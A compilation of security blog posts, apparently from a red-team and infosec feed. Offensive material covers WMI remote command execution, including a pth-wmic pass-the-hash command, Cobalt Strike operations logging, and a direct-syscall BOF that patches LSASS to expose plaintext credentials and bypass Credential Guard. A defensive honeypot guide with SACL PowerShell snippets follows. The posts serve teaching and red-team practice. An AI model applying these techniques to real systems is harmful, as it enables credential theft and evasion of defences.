Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList @(calc.exe)

Using CIM we can call a method like this:

Invoke-CimMethod -ClassName Win32_Process -Name Create -Arguments @{Commandline = 'calc.exe'}

 

Remote WMIC

We also mentioned above that the same tools can be used over the network. This is the syntax you can use to accomplish the above example in remote computers:

WMIC

wmic /NODE:"servername" /USER:"yourdomain\administrator" /PASSWORD:password OS GET Name

Powershell

And, as we did before, here’s how it can be done using PowerShell:

$cred = Get-Credential domain\user
Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList @(calc.exe) -ComputerName servername -Credential $cred

Furthermore, in Linux the tool ‘pth-wmic’ can be used to pass-the-hash instead of the password:

pth-wmic -U domain/adminuser%LM:NT //host "select * from Win32_ComputerSystem"

Conclusion

As you can see, WMI has loads of functionality, most of which have yet to be explored in this article. But even in the little we explored, you can clearly see that WMI can be used as an alternative when PowerShell is monitored or blocking certain scenarios. In a future article, we can play with WMI’s power in other ways good for pentesters such as using it as a C2C in engagements.

I hope this article covered the fundamentals of WMI usage and encouraged you to continue researching on your own. With that in mind, here’s a little homework. As with all useful technologies, there will eventually be a new version to expand on the capabilities proven by the previous version. Windows Management Instrumentation (WMI) is no different as it also has been updated to the Windows Management Infrastructure (MI). Microsoft says that MI is fully backwards compatible while reducing dev time and has tighter integration with Powershell. Go check it out and share what you discover.

 

PowerShell Obfuscation using SecureString

By: @Wietze
20 January 2020 at 00:00
PowerShell has built-in functionality to save sensitive plaintext data to an encrypted object called `SecureString`. Malicious actors have exploited this functionality as a means to obfuscate PowerShell commands. This blog post discusses `SecureString`, examples seen in the wild, and presents a tool [[8](https://wietze.github.io/powershell-securestring-decoder/)] that helps analyse `SecureString` obfuscated commands.

Windows Command-Line Obfuscation

By: @Wietze
23 July 2021 at 00:00
Many Windows applications have multiple ways in which the same command line can be expressed, usually for compatibility or ease-of-use reasons. As a result, command-line arguments are implemented inconsistently making detecting specific commands harder due to the number of variations. This post shows how more than 40 often-used, built-in Windows applications are vulnerable to forms of command-line obfuscation, and presents a tool for analysing other executables.

How to get started with bug bounties and finding vulnerabilities | Guest Casey Ellis

By: Infosec
6 December 2021 at 08:00

On this week’s Cyber Work Podcast, BugCrowd and disclose.io! founder Casey Ellis discusses how to think like a cybercriminal, the crucial need for transparent vulnerability disclosure, the origins of BugCrowd and why mentorship is a gift that goes in both directions.

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

0:00 - Intro 
3:15 - Getting into cybersecurity
4:30 - Criminal mindset in cybersecurity
5:49 - Ellis’s career to date 
9:10 - Healthcare cybersecurity
11:47 - Mentoring others 
13:52 - Mentorship as a two-way street
16:12 - Bugcrowd and bug bounty
19:18 - Vulnerability disclosure project
21:30 - Bug bounty popularity 
24:52 - U.S. sanctions on hacking groups
26:52 - Hiring hackers 
31:52 - Pursue specialization 
33:51 - Cyber threats flying under the radar
39:17 - Working from home safely
40:48 - How to get into bug bounties
42:18 - How to report vulnerabilities
44:04 - Advice to begin ethical hacking 
45:23 - Learn more about Ellis 
45:56 - Outro

About Infosec
Infosec believes knowledge is power when fighting cybercrime. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and privacy training to stay cyber-safe at work and home. It’s our mission to equip all organizations and individuals with the know-how and confidence to outsmart cybercrime. Learn more at infosecinstitute.com.

💾

RedELK Part 3 – Achieving operational oversight

7 April 2020 at 15:08

This is part 3 of a multipart blog series on RedELK: Outflank’s open sourced tooling that acts as a red team’s SIEM and helps with overall improved oversight during red team operations.

In part 1 of this blog series I discussed the core concepts of RedELK and why you should want a tool like this. In part 2 I described a walk-through on integrating RedELK into your red teaming infrastructure. Read those blogs to get a better background understanding of RedELK.

For this blog I’ve setup and compromised a fictitious company. I use the logs from that hack to walk through various options of RedELK. It should make clear why RedELK is really helpful in gaining operational oversight during the campaign.

Intro: the Stroop lab got hacked

In this blog I continue with the offensive lab setup created in part 2. In summary this means that the offensive campaign contains two attack scenarios supported by their own offensive infrastructure, named shorthaul and longhaul. Each have their own technology for transport and each has a dedicated Cobalt Strike C2 server. The image below should give you an overview.

The offensive infrastructure as used in this demo

Now let’s discuss the target: Stroop B.V., a fictitious stroopwafel company. Although the competition is catching up, their stroopwafels are regarded as a real treat and enjoyed around the world. Stroop’s IT environment spans over a few thousand users and computers, an Active Directory domain with subdomains and locations (sites) around the world. With regards to security they are coming from a traditional ‘coconut’-approach: hard security on the outside (perimeter), but no real segmentation or filtering on the inside. They do have a few security measures, such as proxying all internet traffic, dedicated admin-accounts and admin-workstations for AD related tasks. Finally, in order to get to the industrial controls systems (ICS) that produce the stroopwafels – and guard the recipe – it is required to go via a dedicated jump host.

In this demo, I have gained Domain Admin privileges and DCsync’ed the krbtgt account. I have not accessed the secret recipes as I do not want to give away too much details for future students of our trainings. Yes, you read that right, this is the same lab setup we use in our trainings. And yes, besides an awesome lab our students also get to enjoy delicious stroopwafels during our trainings. No digital but real stroopwafels. 🙂

In preparation for this blog post I have hacked through the network already. To make it easy for you to play with the same data, I have uploaded every logfile of this demo (Cobalt Strike, HAProxy and Apache) to the RedELK github. You can use this demo data to import into your own RedELK server and to get hands-on experience with using RedELK.

The end result of the running beacons can be seen below in the two overviews from our Cobalt Strike C2 servers.

Beacon overview of the shorthaul scenario
Beacon overview of the longhaul scenario

Why RedELK?

The mere fact that I have to present to you two pictures from two different Cobalt Strike C2 servers is indicative why we started working on what later resulted in RedELK. Cobalt Strike (or any other C2 framework) is great for live hacking, but it is not great for a central overview. And you really want such a central overview for any bigger red teaming campaign. This is exactly what RedELK does: it gathers all the logs from C2 frameworks and from traffic redirectors, formats and enriches the data, presents it in a single location to give you oversight and allows for easy searching of the data. Finally, it has some logic to alarm you about suspected blue team analyses.

I’ll cover the alarming in a later blog. In this blog we focus on the central presentation and searching.

RedELK oversight

Let’s start with the oversight functionality of RedELK. We can easily see:

  • Red Team Operations: Every action from every operator on every C2 server
  • Redirector Traffic: All traffic that somewhere touched our infrastructure

Because we put everything in an Elasticsearch database, searching through the data is made easy. This way we can answer questions like ‘Did we touch system X on a specific day?’ or ‘What source IP has scanned our redirectors with a user agent similar to our implant but not on the correct URL?’

Besides free format searching, RedELK ships with several pre-made searches, visualisations and dashboards. These are:

  • CS Downloads: all downloaded files form every Cobalt Strike C2 server, directly accessible for download via your browser.
  • CS Keystrokes: every keystroke logged from every Cobalt Strike C2 server.
  • CS IOCs: every Indicator Of Compromise of your operation.
  • CS Screenshots: every screenshot from every Cobalt Strike C2 server, with thumbnails and full images directly visible via your browser.
  • CS Beacons: list with details of every Cobalt Strike beacon.
  • Beacon dashboard: a dashboard with all relevant info from implants.
  • Traffic dashboard: a dashboard with all relevant info on redirector traffic.

Note: at the moment of writing the stable version of RedELK is 1.0.2. In that version there is full support for Cobalt Strike, but no other C2 framework. However, future stable versions will support other C2 frameworks. The version currently in development already has support for PoshC2. Covenant is planned next. Also, the names of the pre-made views searches and of some fields are also made more generic to support other C2 frameworks.

We need to login before we can explore some of these views and show the power of search. See the example below where I log in, go to the Discover section in Kibana, change the time period and open one of the pre-made views (redirector traffic dashboard).

Note: every animated GIF in this blog is clickable to better see the details.

Opening the redirector traffic view

Red Team Operations

Let’s start with an overview of every action on every C2 server; select the Red Team Operations view. Every line represents a single log line of your C2 tool, in our case Cobalt Strike. Some events are omitted by default in this view: join-leave events, ‘new beacon’ events from the main Event Log and everything from the weblog. Feel free to modify it to your liking – you can even click ‘Save’ and overwrite one of RedELK’s pre-made views.

In the example below you can see the default layout contains the time, attackscenario, username, internal IP address, hostname, OS and the actual message from the C2 tool. In our case this is 640 events from multiple team servers from both attack scenarios!

Now let’s say the white team asked if, where and when we used PsExec. Easy question to answer! We search for psexec* and are presented with only the logs where psexec was mentioned. In our case only one time, where we jumped from system L-WIN224 to L-WIN227.

Searching for the execution of PsExec across all C2 servers

As you can see, RedELK does a few things for you. First of all, it indexes all the logs, parses relevant items, makes them searchable and presents them to you in an easy interface.

Cobalt Strike users will notice that there is something going on here. How can RedELK give you all the relevant metadata (username, hostname, etc) per log line while Cobalt Strike only presents that info in the very first metadata line of a new beacon? Well, RedELK has background running scripts that enrich *every* log line with the relevant data. As a result, every log line from a beacon log has the relevant info such as username, hostname, etc. Very nice!

Another simple but super useful thing we saw in the demo above is that every log line contains a clickable link to the full beacon.log. Full beacon logs directly visible in your browser! Great news for us non-Elasticsearch-heros: CTRL+F for easy searching.

As you can see, a few clicks in a web browser beat SSHing into all of your C2 servers and grepping through the logs (you shouldn’t give everybody in your red team SSH access to your C2 servers anyway, right?).

Now that was the basics. Let’s explore a few more pre-made RedELK views.

List of Indicators of Compromise

In the previous example I searched for PsExec lateral movement actions. As you probably know, PsExec uploads an executable that contains your evil code to the target system, creates a service pointing to this executable and remotely starts that service. This leaves several traces on the remote system, or Indicators of Compromise as the blue team likes to call them. Cobalt Strike does a very good job in keeping track of IOCs it generates. In RedELK I created a parser for such IOC events and pre-made a search for you. As a result you can get a full listing of every IOC of your campaign with a single click. Four clicks if you count the ‘export to CSV’ function of Kibana as well.

IOC overview

Cobalt Strike Downloads

This is one of the functions I am personally most happy with. During our red team operations we often download files from our target to get a better understanding of the business operations (e.g. a manual on payment operations). Most C2 frameworks, and Cobalt Strike in this example, download files form the implant to the C2 server. Before you can open the file you need to sync it to your local client. The reason for this is valid: you don’t want every file to auto sync to every logged in operator. But with dozens maybe hundreds of files per C2 server, and multiple C2 servers in the campaign, I often get lost and I no longer know on which C2 which file was downloaded. Especially if it was downloaded by one of my colleagues. Within the C2 framework interface it is very hard to search for the file you are looking for. Result: time lost due to useless syncing and viewing of files.

RedELK solves this by presenting an aggregated list of every file from every C2 in the campaign. In the Kibana interface you can see and search all kinds of details (attack scenario name, username, system name, file name, etc). In the background, RedELK has already synced every file to the local RedELK server, allowing for easy one click downloads straight from Kibana.

Metadata and direct access to all downloads from all C2 servers

Logged keystrokes

Ever had difficulties trying to remember which user on what moment entered that one specific term that was logged in a keystroke? RedELK to the rescue: one click easy presenting of all logged keystrokes. And, of course searchable.

Searching logged keystrokes

I believe there is more work to be done by formatting the keystroke logs and alarming when certain keywords are found. But that is left for future versions.

Screenshots

Another thing that was bugging me was trying to recall a specific screenshot weeks/months earlier in the campaign. Most often I can’t remember the user, but when I see the picture I know what I was looking for. With hundreds of screenshots per C2 server this becomes time consuming.

To solve this, RedELK indexes every screenshot taken, and makes them ready for download and presents some sort of a thumbnail preview picture. Hooray!

Screenshots overview

I’m not entirely happy just yet with the thumbnail previews, specifically the size. I’m limited by the screen space Kibana allows. Likely something I’ll fix in a new release of RedELK.

Overview of all compromised systems

A final thing I want to discuss on the viewpoint of red team operations is the overview of every C2 beacon in the campaign. RedELK presents this with the CS Beacons overview. This is a great overview of every implant, the system it ran on, the time of start and many other details. Again you can use the Kibana export-to-CSV function to generate a list that you can share with blue and/or white.

In this example I want to highlight one thing. RedELK also keeps track if a Cobalt Strike beacon was linked to another beacon. In the example below you can see that beacon ID 455228 was linked to 22170412, which in turn was linked to 1282172642. Opening the full beacon log file and searching for “link to” we circle back to the PsExec example we discussed above.

Metadata on all beacons from the operation

Redirector Traffic

The examples above all covered overview of red team operations. But RedELK also helps you with giving overview and insight into the traffic that has hit your red team infrastructure. This is done by using the pre-made view Redirector Traffic.

Redirector traffic overview

We can see that RedELK parses a lot of information. The default view shows several columns with relevant data, ordered per log line with the latest event on top. Diving into a single log line you can see there are many more information elements. The most important are:

  • The attackscenario, shorthaul in our example.
  • The beat.hostname of the redir this happened on.
  • The full log line as appeared on the system (message).
  • The IP address of the redirector traffic was received on (redir.frontendip).
  • The redirprogram name (Apache in this case) and the redir.frontname and redir.backendname where on the traffic was received and sent.
  • Several headers of the HTTP traffic, including X-Host and X-Forwarded-For.
  • The redirtraffic.sourceip of the traffic.
  • In case X-Forwarder-For was set, redirtraffic.sourceip becomes the real client’s address and redirtraffic.sourceipcnd contains the address of the CDN endpoint.

The majority of this information is not available in a default Apache or HAProxy log line. But it is information that the red team is interested in, now or in the future. This is why it is so important to modify the logging configuration of your redirector. Default log setup means limited info.

RedELK also enriches the data with information from several sources. The GeoIP was already shown in the previous example – it adds geo location info and ownership of the IP block and stores it in geoip.* fields.

RedELK als does reverse DNS lookups for the remote IP addresses and it sets a tag if the source IP address was found in a local config file like /etc/redelk/iplist_redteam.conf, /etc/redelk/torexitnodes.conf, etc.

But there is one more enrichment going on that is extremely helpful: Greynoise. Greynoise is a service that aims to identify the internet background noise from scanners, either legit ones such as Shodan and Google, and evil ones such as botnets. Most red teams are not necessarily interested in all the details that Greynoise has about an IP address. But they do want to know when an IP address is scanning their infra that is *not known* as a scanner!

Let’s see the example below. We start with almost 9000 log lines on traffic. When opening one event we can see the multitude of info that Greynoise has on this IP. In our example its likely a MIRAI botnet scanner and the greynoise.status is ok. But when we filter on greynoise.status:"unknown" and NOT redirtraffic.httpstatus:"200" we get all data from IP addresses not belonging to publicly known scanners that scan our infra. We went from almost 9000 hits to 44 hits, a number that is easily analysed by the human eye. Would any of these hits be the blue team scanning our infra?

Finding strange traffic to your redirs by filtering on Greynoise status

There are many more examples on interesting searches for traffic hitting your red team infrastructure, e.g. TOR addresses (RedELK tags those), strange user agents such as curl* and python*, etc. But I’m sure you don’t need a blog post to explore these.

Wrap-up

I hope this blog post has given you a better understanding what RedELK has to offer, and how to use it. There is more. I haven’t even touched on visualizations and on dashboards that come with RedELK, and most importantly: alarms. This is left for another blog post.

A few closing thoughts to help you have a smooth experience in getting up-and-running with RedELK:

  • Fully follow the installation including modifying of the redirector logging configuration to get the most out of your data.
  • Also perform post installation tuning by modifying the config files in /etc/redelk/ on the RedELK server.
  • RedELK’s main interface is Kibana. It is easy to get started, has a lot of features but it can be tricky to fully understand the powerful search language. Luckily, most searches can also be done via clicky-clicky. I have absolutely no shame in admitting that even after many years of experience with searching in Kibana I still regularly prefer clicks for more difficult searches.
  • The pre-made views are just that: pre-made. You can delete, modify and rename them to your liking, or create new ones from scratch.

Have fun exploring RedELK and let me know your thoughts!

The post RedELK Part 3 – Achieving operational oversight appeared first on Outflank.

Direct Syscalls in Beacon Object Files

By: Cornelis
26 December 2020 at 10:47

In this post we will explore the use of direct system calls within Cobalt Strike Beacon Object Files (BOF). In detail, we will:

  • Explain how direct system calls can be used in Cobalt Strike BOF to circumvent typical AV and EDR detections.
  • Release InlineWhispers: a script to make working with direct system calls more easy in BOF code.
  • Provide Proof-of-Concept BOF code which can be used to enable WDigest credential caching and circumvent Credential Guard by patching LSASS process memory.

Source code of the PoC can be found here:

https://github.com/outflanknl/WdToggle

Source code of InlineWhispers can be found here:

https://github.com/outflanknl/InlineWhispers

Beacon Object Files

Cobalt Strike recently introduced a new code execution concept named Beacon Object Files (abbreviated to BOF). This enables a Cobalt Strike operator to execute a small piece of compiled C code within a Beacon process.

What’s the benefit of this? Most importantly, we get rid of a concept named fork & run. Before Beacon Object Files, this concept was the default mechanism for running jobs in Cobalt Strike. This means that for execution of most post-exploitation functionality a sacrificial process was started (specified using the spawnto parameter) and subsequently the offensive capability was injected to that process as a reflective DLL. From an AV/EDR perspective, this has various traits that can be detected, such as process spawning, process injection and reflective DLL memory artifacts in a process. In many modern environments fork & run can easily turn into an OPSEC disaster. With Beacon Object Files we run compiled position independent code within the context of Beacon’s current process, which is much more stealthy.

Although the concept of BOF is a great step forward in avoiding AV/EDR for Cobalt Strike post-exploitation activity, we could still face the issue of AV/EDR products hooking API calls. In June 2019 we published a blogpost about Direct System Calls and showed an example how this can be used to bypass AV/EDR software. So far, we haven’t seen direct system calls being utilized within Beacon Object files, so we decided to write our own implementation and share our experiences in this blog post.

Direct syscalls and BOF practicalities

Many Red Teams will be familiar by now with the concept of using system calls to bypass API hooks and avoid AV/EDR detections. 

In our previous system call blog we showed how we can utilize the Microsoft Assembler (MASM) within Visual Studio to include system calls within a C/C++ project. When we build a Visual Studio project that contains assembly code, it generates two object files using the assembler and C compiler and link all pieces together to form a single executable file.

To create a BOF file, we use a C compiler to produce a single object file. If we want to include assembly code within our BOF project, we need inline-assembly in order to generate a single object file. Unfortunately, inline-assembly is not supported in Visual Studio for x64 processors, so we need another C compiler which does supports inline-assembly for x64 processors.

Mingw-w64 and inline ASM

Mingw-w64 is the Windows version of the GCC compiler and can be used to create 32- and 64-bit Windows application. It runs on Windows, Linux or any other Unix based OS. Best of all, it supports inline-assembly even for x64 processors. So, now we need to understand how we can include assembly code within our BOF source code.

If we look at the man page of the Mingw-w64 or GCC compiler, we notice that it supports assembly using the -masm=dialect syntax:

Using the intel dialect, we are able to write assembly code via the same dialect like we did with the Microsoft Assembler in Visual Studio. To include inline-assembly within our code we can simply use the following assembler template syntax:

        asm("nop \n  "
            "nop \n  "
            "nop")
  • The starting asm keyword is either asm or __asm__
  • Instructions must be separated by a newline (literally \n).

More information about the GCC’s assembler syntax can be found in the following guide: 

https://www.felixcloutier.com/documents/gcc-asm.html#assembler-template

From __asm__  to BOF

Let’s put this together in the following example which shows a custom version of the NtCurrentTeb() routine using inline-assembly. This routine can be used to return a pointer to the Thread Environment Block (TEB) of the current thread, which can then be used to resolve a pointer to the ProcessEnvironmentBlock (PEB):

To make this assembly function available within our C code and to declare its name, return type and parameters we use the EXTERN_C keyword. This preprocessor macro specifies that the function is defined elsewhere, has C linkage and uses the C-language calling convention. This methodology can also be used to include assembly system call functions within our code. Just transform the system calls invocation written in assembly to the assembler template syntax, add the function definition using the EXTERN_C keyword and save this in a header file, which can be included within our project.

Although it is perfectly valid to have an implementation of a function in a header file, this is not best practise to do. However, compiling an object file using the -o option allows us to use one source file only, so in order not to bloat our main source file with assembly functions we put these in a separate header file.

To compile a BOF source code which includes inline assembly we use the following compiler syntax:

x86_64-w64-mingw32-gcc -o bof.o -c bof.c -masm=intel 

WdToggle

To demonstrate the whole concept, we wrote a Proof-of-Concept code which includes direct system calls using inline-assembly and can be compiled to a Beacon Object File.

This code shows how we can enable WDigest credential caching by toggling the g_fParameter_UseLogonCredential global parameter to 1 within the Lsass process (wdigest.dll module). Furthermore, it can be used to circumvent Credential Guard (if enabled) by toggling the g_IsCredGuardEnabled variable to 0 within the Lsass process. 

Both tricks enable us to make plaintext passwords visible again within LSASS, so they can be displayed using Mimikatz. With the UseLogonCredential patch applied you only need a user to lock and unlock his session for plaintext credentials to be available again. 

This PoC is based on the following excellent blogposts by _xpn_ and N4kedTurtle from Team Hydra. These blogs are a must read and contain all necessary details:

Both blogposts include PoC code to patch LSASS, so from that viewpoint our code is nothing new. Our PoC builds on this work and only demonstrates how we can utilize direct system calls within a Beacon Object file to provide a more OPSEC safe way of interacting with the LSASS process and bypassing API hooks from Cobalt Strike.

Patch Limitations

The memory patches applied using this PoC are not reboot persistent, so after a reboot you must rerun the code. Furthermore, the memory offsets to the g_fParameter_UseLogonCredential and g_IsCredGuardEnabled global variables within the wdigest.dll module could change between Windows versions and revisions. We provided some offsets for different builds within the code, but these can change in future releases. You can add your own version offsets which can be found using the Windows debugger tools.

Detection

To detect credential theft through LSASS memory access, we could use a tool like Sysmon to monitor for processing opening a handle to LSASS. We can monitor for suspicious processes accessing the LSASS process and thereby create telemetry for detecting possible credential dumping activity.

Of course, there are more options to detect credential theft, for example using an advanced detection platform like Windows Defender ATP. But if you don’t have the budget and luxury of using these fancy platforms, then Sysmon is that free tool that can help fill the gap.

InlineWhispers

A few months after we published our Direct System Call blogpost, @Jackson_T published a great tool named SysWhispers. Sourced from the SysWhispers Git repository: 

SysWhispers helps with evasion by generating header/ASM files implants can use to make direct system calls”.

It is a great tool to automate the process of generating header/ASM pairs for any system call, which can then be used within custom built Red Teaming tools.

The .asm output file generated by the tool can be used within Visual Studio using the Microsoft Macro Assembler. If we want to use the system call functions generated from the SysWhispers output within a BOF project, we need some sort of conversion so they match the assembler template syntax. 

Our colleague @DaWouw wrote a Python script that can be used to transform the .asm output file generated by SysWhispers to an output file that is suitable within a BOF project.

It converts the output to match the assembler template syntax, so the functions can be used from your BOF code. We can manually enter which system calls are used in our BOF to prevent including unused system functions. The script is available within the InlineWhispers repository on our Github page:

https://github.com/outflanknl/InlineWhispers

Summary

In this blog we showed how we can use direct system calls within Cobalt Strike Beacon Object Files. To use direct system calls we need to write assembly using the assembler template syntax, so we can include assembly functions as inline-assembly. Visual Studio does not support inline-assembly for x64 processors but fortunately Mingw-w64 does.

To demonstrate the usage of direct system calls within a Beacon object file, we wrote a Proof-of-Concept code which can be used to enable WDigest credential caching. Furthermore, we wrote a script called InlineWhispers that can be used to convert .asm output generated by SysWhispers to an inline assembly header file suitable for BOF projects.

We hope this blogpost helps understanding how direct system calls can be implemented within BOF projects to improve OPSEC safety.

The post Direct Syscalls in Beacon Object Files appeared first on Outflank.

Catching red teams with honeypots part 1: local recon

By: Jarno
3 March 2021 at 15:16

This post is the first part of a series in which we will cover the concept of using honeypots in a Windows environment as an easy and cost-effective way to detect attacker (or red team) activities. Of course this blog post is about catching real attackers, not just red teams. But we picked this catchy title as the content is based on our red teaming experiences.

Upon mentioning honeypots, a lot of people still think about a system in the network hosting a vulnerable or weakly configured service. However, there is so much more you can do, instead of spawning a system. Think broad: honey files, honey registry keys, honey tokens, honey (domain) accounts or groups, etc.

In this post, we will cover:

  • The characteristics of an effective honeypot.
  • Walkthrough on configuring a file- and registry based honeypots using audit logging and SACLs.
  • Example honeypot strategies to catch attackers using popular local reconnaissance tools such as SeatBelt and PowerUp.

Characteristics of a good honeypot

For the purpose of this blog, a honeypot is defined as an object under your (the defender’s) control, that is used as a tripwire to detect attacker activities: read, use and/or modification of this object is monitored and alerted upon.

Let’s start by defining what a good honeypot should look like. A good honeypot should have at least the following characteristics:

  • Is easily discovered by an attacker (i.e. low hanging fruit)
  • Appears too valuable for an attacker to ignore
  • Cannot be identified as ‘fake’ at first sight
  • Abuse can be easily monitored (i.e. without many false positives)
  • Trigger allows for an actionable response playbook

It is extremely important that the honeypots you implement, adhere to the characteristics above. We have performed multiple red teaming gigs in which the client told us during the post-engagement evaluation session that they did implement honeypots using various techniques, however we did not stumble across them and/or they were not interesting enough from an attacker’s perspective.

Characteristics of local reconnaissance

When an attacker (or red teamer) lands on a system within your network, he wants to gain contextual information about the system he landed on. He will most likely start by performing reconnaissance (also called triage) on the local system to see what preventive and detective controls are in place on the system. Important information sources to do so are configuration and script files on the local system, as well as registry keys.

Let’s say you are an attacker, what files and registry would you be interested in, where would you look? Some typical examples of what an attacker will look for are:

  • Script folders on the local drive
  • Currently applied AppLocker configuration
  • Information on installed antivirus/EDR products
  • Configuration of log forwarding
  • Opportunities for local privilege escalation and persistence

A good example of common local recon activities can be gathered from the command overview of the Seatbelt project.

Catching local enumeration tools

There are tons of attacker tools out there that automate local reconnaissance. These tools look at the system’s configuration and standard artefacts that could leak credentials or other useful information. Think of enumerating good old Sysprep/unattend.xml files that can store credentials, which are also read out by tools like SharpUp, PowerUp, and PrivescCheck:

Snippet of SharpUp code used to enumerate possible Unattended-related files

Next to files, there are also quite some registry keys that are often enumerated by attackers and/or reconnaissance tooling. A few examples are:

Snippet of Seatbelt code used to enumerate the AppLocer policy, stored in registry

As a defender, you can build honeypots for popular files and registry keys that are opened by these tools and alert upon opening by suspicious process-user combinations. Let’s dive into how this can be achieved on a Windows system.

File- and registry-based honeypots

A file-based honeypot is a dummy file (i.e. a file not really used in your environment) or legit file (i.e. Unattend.xml or your Sysmon configuration file) for which audit logging is configured. You do this by configuring a so-called SACL (System Access Control list, more on this below) for the specific file. The same approach can be used to configure audit logging for a certain registry key.

The remainder of this post will guide you through configuring the audit logging prerequisites for file- and registry auditing, as well as the configuration of a SACL for a file/registry key.

First things first: what is a SACL?

You might have heard the terms SACL and DACL before. In a nutshell, it goes as follows: any securable object on your Windows system (i.e., file, directory, registry key, etc.) has a DACL and a SACL.

  • A DACL is used to configure who has what level of access to a certain object (file, registry entry, etc.).
  • A SACL is used to configure what type of action on an object is audited (i.e., when should an entry be written to the local system’s Security audit log).

So, amongst others, a SACL can be used to generate log entries when a specific file or registry key is accessed.

Prerequisite: configuring auditing of object access

To implement a file-based honeypot, we first need to make sure that auditing for object access is enabled on the system where we want to create the file- or registry based honeypot. The required object auditing categories are not enabled by default on a Windows system.

Enabling auditing of file- and registry access can be done using a Group Policy. Create a new GPO and configure the options below:

  • Audit File System’ audit ‘success‘ and ‘failure‘.
  • Audit Registry’ audit ‘success‘ and ‘failure‘.

These policies can be found under ‘Computer Configuration’ -> ‘Policies’ -> ‘Windows Settings’ -> ‘Security Settings’ ->  ‘Advanced Audit Configuration’ -> ‘Object Access’:

Once you configured your GPO, you can use the auditpol command line utility to see if the GPO has been applied successfully. Below example output of the command on a test system:

auditpol /get /category:"object access"
Auditpol output showing that file system- and registry auditing is configured

NB: if the configured settings are not being applied successfully, your environment might have GPOs configured that make use of old-school high-level audit policies instead of advanced audit policies. Review if this is the case and migrate them to advanced audit policies. If you have multiple GPOs that specify ‘Advanced Audit Policies’, you might need to enable ‘Audit: Force audit policy subcategory settings (Windows Vista or later) to override audit policy category settings’ in your ‘Default Domain Policy’.

Configuring auditing for a specific file

Now that auditing of object access is configured, let’s enable access logging for a specific file. We do this by configuring a so-called SACL. Right-click -> Properties on the file you want to configure access monitoring for and use the security tab -> advanced to configure an auditing rule for the principal ‘Everyone’, and select ‘List folder / read data’.

Configuring auditing for a specific file

You can also do so using PowerShell. For this, use the code snippet below.

#File for which auditing to be configured
$FileToAudit = "c:\Windows\Panther\Unattend.xml"

# Set properties for new SACL
$AuditIdentity = "Everyone"       # who to audit
$AuditOnAction = "ReadData"       # what action to audit. Other actions could be: "Write, TakeOwnership". More info: https://docs.microsoft.com/en-us/dotnet/api/system.security.accesscontrol.filesystemrights?view=net-5.0
$AuditType = "Success"            # Audit action "Success"
$InheritanceFlags = "None"        # Not inherited by child objects
$PropagationFlags = "None"        # Don't propagate to child objects
$NewAuditACE = New-Object System.Security.AccessControl.FileSystemAuditRule($AuditIdentity,$AuditOnAction,$InheritanceFlags,$PropagationFlags,$AuditType)

# Get the currently configured ACL
$Acl = Get-Acl $FileToAudit -Audit

# Add the ACE, preserving previously configured entries
$Acl.AddAuditRule($NewAuditACE)

Making a file look more interesting/legit

For the purpose of this blog post I created an Unattend.xml file in the ‘c:\windows\panther’ folder. It has the date modified of today, in contrast to all the other files, which have their date modified set to the installation time of this host. Unattend.xml is normally not modified after finishing the installation and configuring of the system. The fact that the file has a very recent date modified, could alert an attacker in this file being a dummy file, refraining from opening it.

Let’s ‘timestomp’ the fake Unattend.xml file, making it look like it was created on the same date:

$file=(gi Unattend.xml);
$date='02/15/2021 08:04';
$file.LastWriteTime=$date;
$file.LastAccessTime=$date;
$file.CreationTime=$date 
Altering the ‘date modified’ value of a file using PowerShell

Generated log entry for file access

Once audit logging is configured, an event with event ID 4663 is generated every time the file is accessed. This log entry contains the user and process that is used to access the file.

Log entry showing that file Unattend.xml was accessed

Configuring auditing for a specific registry key

We can use the same approach to configure auditing for registry settings. Let’s configure audit logging to detect the enumeration of the configured AppLocker policy. Open the registry editor and navigate to the AppLocker policy location: ‘HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\SrpV2’. Right click -> Properties on the ‘SrpV2’ folder. Click on ‘advanced’ and use the ‘Auditing’ tab of the ‘Advanced Security Settings’ to configure anauditing rule for the principal ‘Everyone’, and select ‘Query Value’ (screenshot below).

Configuring auditing for a specific registry key

NB: if you do not have AppLocker configured within your environment, you can create a dummy registry entry in the location above. Another option is to deploy a dummy AppLocker configuration with default rules, without actually enforcing ‘block’ or ‘audit’ mode in the AppLocker Policy itself. This does create registry entries under SrpV2, but does not enforce an AppLocker configuration.

#Registry key for which auditing is to be configured
$RegKeyToAudit = "HKLM:\SOFTWARE\Policies\Microsoft\Windows\SrpV2"

# Set properties for new SACL
$AuditIdentity = "Everyone"       # who to audit
$AuditOnAction = "QueryValue"       # what action to audit. Other actions could be: "CreateSubKey, DeleteSubKey". More info: https://docs.microsoft.com/en-us/dotnet/api/microsoft.win32.registrykey?view=dotnet-plat-ext-5.0#methods
$AuditType = "Success"            # Audit action "Success"
$InheritanceFlags = "ContainerInherit,ObjectInherit"        # Entry is inherited by child objects
$PropagationFlags = "None"        # Don't propagate to child objects
$NewRegistryAuditACE = New-Object System.Security.AccessControl.RegistryAuditRule($AuditIdentity,$AuditOnAction,$InheritanceFlags,$PropagationFlags,$AuditType)

# Get the currently configured ACL
$Acl = Get-Acl $RegKeyToAudit -Audit

# Add the ACE, preserving previously configured entries
$Acl.AddAuditRule($NewRegistryAuditACE)

# Apply the new configuration
$Acl | Set-Acl | Out-Null 

Generated log entry for registry access

Once audit logging is configured, an event with event ID 4663 is generated every time the registry key is accessed. This log entry contains the user and process that is used to access the file.

Log entry showing that the AppLocker configuration was enumerated

Centralised logging & alerting

Now that file auditing is configured on the system, make sure that at least event ID 4663 is forwarded to your central log management solution. If you have yet to configure Windows log forwarding, please refer to Palantir’s blog post for an extensive overview of Windows Event Forwarding.

Alerting and contextual awareness

After making sure that the newly generated events are available in your central log management solution, you can use this data to define alerting rules or perform hunts. While doing this, contextual information is important. Every environment is different. For example: there might be periodic processes in your organisation that access files for which you configured file auditing.

Things to keep in mind when defining alerting rules or performing hunts:

  • Baseline normal activity: what processes and subjects legitimately access the specific file on disk periodically?
  • Beware to not exclude a broad list of processes for alerting. The screenshot that shows an example event ID 4663, earlier in this post, shows dllhost.exe as the source process of opening a file. This is the case when you copy/paste a file.

Suggestions for files and registry keys to track using SACLs

When creating file-based honeypots, always keep in mind the characteristics of a good honeypot that are covered in the beginning of this post: easy to discover for attacker, too valuable to ignore, can’t be identified as fake, easy to monitor and having a playbook to respond.

